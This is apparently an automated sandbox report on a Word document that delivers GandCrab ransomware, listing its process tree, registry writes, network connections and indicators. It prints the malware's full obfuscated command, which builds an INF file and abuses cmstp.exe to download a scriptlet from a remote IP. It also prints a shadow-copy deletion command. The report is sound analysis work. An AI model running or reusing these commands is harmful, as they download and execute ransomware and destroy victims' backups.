| File name: | 소환하다.doc |
| Full analysis: | https://app.any.run/tasks/fb9112b9-00b1-46e8-9e73-6f5af229462c |
| Verdict: | Malicious activity |
| Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
| Analysis date: | March 22, 2019, 10:12:05 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Thu Mar 21 19:19:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
| MD5: | 6D70903794AB3CA05DD1B1B4F917204F |
| SHA1: | DBE96D823FB6C1B855020EA6676F27E9C13A0148 |
| SHA256: | D383CEE6586F23BC1DCDD4D1E8638D58E795C0833111BCBD94AE1FB883AAE988 |
| SSDEEP: | 3072:B6pgFP6P77AjBNJx4WDgDBiTBEIGMqFWrdn2TXz+rOieOnewQKJk2iwHagf:B6pO+AnJ2Wsi9EI4EdGKOseZ6z |
MALICIOUS
SQUIBLYDOO was detected
- cmstp.exe (PID: 3052)
Application was dropped or rewritten from another process
- 58131.exe (PID: 2436)
Writes file to Word startup folder
- 58131.exe (PID: 2436)
Dropped file may contain instructions of ransomware
- 58131.exe (PID: 2436)
Renames files like Ransomware
- 58131.exe (PID: 2436)
Deletes shadow copies
- cmd.exe (PID: 2680)
Changes settings of System certificates
- 58131.exe (PID: 2436)
GANDCRAB detected
- 58131.exe (PID: 2436)
SUSPICIOUS
Reads Internet Cache Settings
- cmstp.exe (PID: 3052)
Creates files in the user directory
- cmd.exe (PID: 1668)
- cmstp.exe (PID: 3052)
- 58131.exe (PID: 2436)
Executable content was dropped or overwritten
- cmstp.exe (PID: 3052)
Creates files in the program directory
- 58131.exe (PID: 2436)
Starts CMD.EXE for commands execution
- 58131.exe (PID: 2436)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2892)
Reads the machine GUID from the registry
- WINWORD.EXE (PID: 2892)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2892)
Dropped object may contain TOR URL's
- 58131.exe (PID: 2436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | Admin |
| Keywords: | - |
| Comments: | - |
| Template: | Normal |
| LastModifiedBy: | Admin |
| RevisionNumber: | 3 |
| Software: | Microsoft Office Word |
| TotalEditTime: | 2.0 minutes |
| CreateDate: | 2019:02:28 14:52:00 |
| ModifyDate: | 2019:03:21 19:19:00 |
| Pages: | 1 |
| Words: | 4 |
| Characters: | 23 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 26 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
43
Monitored processes
6
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 592 | vssadmin delete shadows /all /quiet | C:\Windows\SysWOW64\vssadmin.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1668 | cmd /V /C set "u05=s" && !u05!et "u39=\" && !u05!et "u42=e" && !u05!et "u43=i" && !u05!et "u49=A" && !u05!et "u1=N" && !u05!et "u5=d" && c!u49!ll !u05!et "u6=%!u49!PP!u5!!u49!T!u49!%" && c!u49!ll !u05!et "u63=%R!u49!!u1!!u5!OM%" && !u05!et "u62=!u6!!u39!M!u43!cro!u05!oft!u39!T!u42!mplat!u42!s!u39!!u63!.txt" && !u05!et "u8="^" && (For %i in ("[v!u42!r!u05!ion]" "!u05!ignatur!u42!=$Wi!u1!dow!u05! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!u42!faultIn!u05!tall_Singl!u42!U!u05!er]" "UnR!u42!gi!u05!t!u42!rOCXs=u66" "[u66]" "%11%\%u0_1%%u0_2%%u0_3%,NI,%u_1%%u_2%%u_3%%u_4%%u_5%%u_6%%u_7%%u_8%%u_9%%u_10%%u_11%%u_12%%u_13%%u_14%" "[!u05!tring!u05!]" "u_1=ht" "u_2=tp" "u_3=:/" "u_4=/1" "u_5=34" "u_6=.2" "u_7=09" "u_8=.8" "u_9=8." "u_10=23" "u_11=/s" "u_12=ub" "u_13=.t" "u_14=xt" "u0_2=rO" "u0_1=sC" "u0_3=bJ" ) do @echo %~i)>"!u62!" && echo !u05!erv!u43!ceNam!u42!=!u8! !u8!>>!u62! && echo !u05!hortSvcN!u49!me=!u8! !u8!>>!u62! && c!u49!ll !u05!et "u25=%WI!u1!!u5!IR%" && !u05!t!u49!rt "" !u25!!u39!Sy!u05!t!u42!m32!u39!cm!u05!tp.!u42!x!u42! /s /ns "!u62!" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2436 | "C:\Users\admin\AppData\Roaming\Microsoft\58131.exe" | C:\Users\admin\AppData\Roaming\Microsoft\58131.exe | cmstp.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2680 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\SysWOW64\cmd.exe | — | 58131.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\소환하다.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.5123.5000 Modules
| |||||||||||||||
| 3052 | C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\2565.txt" | C:\Windows\System32\cmstp.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile Installer Exit code: 0 Version: 7.02.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
1 782
Read events
1 359
Write events
415
Delete events
8
Modification events
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | jz& |
Value: 6A7A26004C0B0000010000000000000000000000 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1316356138 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1316356222 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1316356223 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 4C0B000044CC43C697E0D40100000000 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | 2c& |
Value: 326326004C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | 2c& |
Value: 326326004C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2892) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
Executable files
1
Suspicious files
2 211
Text files
224
Unknown types
67
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4E6A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFE989A7F73B9A6C44.TMP | — | |
MD5:— | SHA256:— | |||
| 2436 | 58131.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | — | |
MD5:— | SHA256:— | |||
| 2892 | WINWORD.EXE | C:\Users\admin\Desktop\~$소환하다.doc | pgc | |
MD5:— | SHA256:— | |||
| 3052 | cmstp.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\sub[1].txt | xml | |
MD5:— | SHA256:— | |||
| 1668 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Templates\2565.txt | ini | |
MD5:— | SHA256:— | |||
| 2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8460C7EF.wmf | wmf | |
MD5:— | SHA256:— | |||
| 2892 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\소환하다.LNK | lnk | |
MD5:— | SHA256:— | |||
| 2436 | 58131.exe | C:\$Recycle.Bin\S-1-5-21-3896776584-4254864009-862391680-1000\RUUMEOW-MANUAL.txt | text | |
MD5:— | SHA256:— | |||
| 2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{72069925-1B99-4914-8FFC-0C51023DE917}.tmp | binary | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3052 | cmstp.exe | GET | 200 | 134.209.88.23:80 | http://134.209.88.23/sub.txt | US | xml | 259 Kb | malicious |
2436 | 58131.exe | POST | 404 | 107.173.49.208:443 | https://www.kakaocorp.link/static/pics/fukees.jpg | US | html | 599 b | malicious |
2436 | 58131.exe | GET | 301 | 107.173.49.208:80 | http://www.kakaocorp.link/ | US | html | 162 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3052 | cmstp.exe | 134.209.88.23:80 | — | — | US | malicious |
2436 | 58131.exe | 107.173.49.208:80 | www.kakaocorp.link | ColoCrossing | US | malicious |
2436 | 58131.exe | 107.173.49.208:443 | www.kakaocorp.link | ColoCrossing | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.kakaocorp.link |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3052 | cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet |
2 ETPRO signatures available at the full report